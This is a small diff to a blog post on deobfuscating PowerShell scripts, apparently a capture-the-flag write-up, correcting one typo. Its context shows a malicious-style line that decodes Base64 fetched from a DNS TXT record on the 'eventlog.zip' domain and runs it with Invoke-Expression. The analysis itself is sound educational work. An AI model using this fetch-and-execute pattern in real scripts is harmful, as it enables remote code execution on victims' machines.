MZHeader/MZHeader.github.io/_posts/2023-11-25-obfuscated-powershell-scripts.md

 [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($5GMLW)) | Invoke-Expression } } } catch { }
 ```

-Now we can see that the variable "$5GMLW" is defined and invoked from Base64, which is geting the txt record from the "eventlog.zip" domain (at the time, this was the flag for the challenge)
+Now we can see that the variable "$5GMLW" is defined and invoked from Base64, which is getting the txt record from the "eventlog.zip" domain (at the time, this was the flag for the challenge)